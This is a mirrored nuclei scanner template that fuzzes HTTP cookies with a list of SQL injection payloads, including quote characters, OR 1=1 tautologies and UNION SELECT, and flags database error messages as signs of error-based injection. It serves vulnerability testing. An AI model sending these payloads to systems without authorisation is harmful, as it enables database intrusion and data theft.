mirror of
https://github.com/projectdiscovery/nuclei.git
synced 2025-12-29 22:23:02 +00:00
60 lines
1.3 KiB
YAML
60 lines
1.3 KiB
YAML
|
|
id: cookie-fuzzing-error-sqli
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: fuzzing error sqli payloads in cookie
|
||
|
|
author: pdteam
|
||
|
|
severity: info
|
||
|
|
description: |
|
||
|
|
This template attempts to find SQL injection vulnerabilities by fuzzing http cookies with SQL injection payloads.
|
||
|
|
Note: this is example template, and payloads/matchers need to be modified appropriately.
|
||
|
|
|
||
|
|
http:
|
||
|
|
- filters:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- 'method == "GET"'
|
||
|
|
- len(cookie) > 0
|
||
|
|
condition: and
|
||
|
|
|
||
|
|
payloads:
|
||
|
|
sqli:
|
||
|
|
- "'"
|
||
|
|
- ''
|
||
|
|
- '`'
|
||
|
|
- '``'
|
||
|
|
- ','
|
||
|
|
- '"'
|
||
|
|
- ""
|
||
|
|
- /
|
||
|
|
- //
|
||
|
|
- \
|
||
|
|
- \\
|
||
|
|
- ;
|
||
|
|
- -- or #
|
||
|
|
- '" OR 1 = 1 -- -'
|
||
|
|
- ' OR '' = '
|
||
|
|
- '='
|
||
|
|
- 'LIKE'
|
||
|
|
- "'=0--+"
|
||
|
|
- OR 1=1
|
||
|
|
- "' OR 'x'='x"
|
||
|
|
- "' AND id IS NULL; --"
|
||
|
|
- "'''''''''''''UNION SELECT '2"
|
||
|
|
- '%00'
|
||
|
|
|
||
|
|
fuzzing:
|
||
|
|
- part: cookie
|
||
|
|
type: postfix
|
||
|
|
mode: single
|
||
|
|
fuzz:
|
||
|
|
- '{{sqli}}'
|
||
|
|
|
||
|
|
stop-at-first-match: true
|
||
|
|
matchers:
|
||
|
|
- type: word
|
||
|
|
words:
|
||
|
|
- "unrecognized token:"
|
||
|
|
- "syntax error"
|
||
|
|
- "null"
|
||
|
|
- "SELECTs to the left and right of UNION do not have the same number of result columns"
|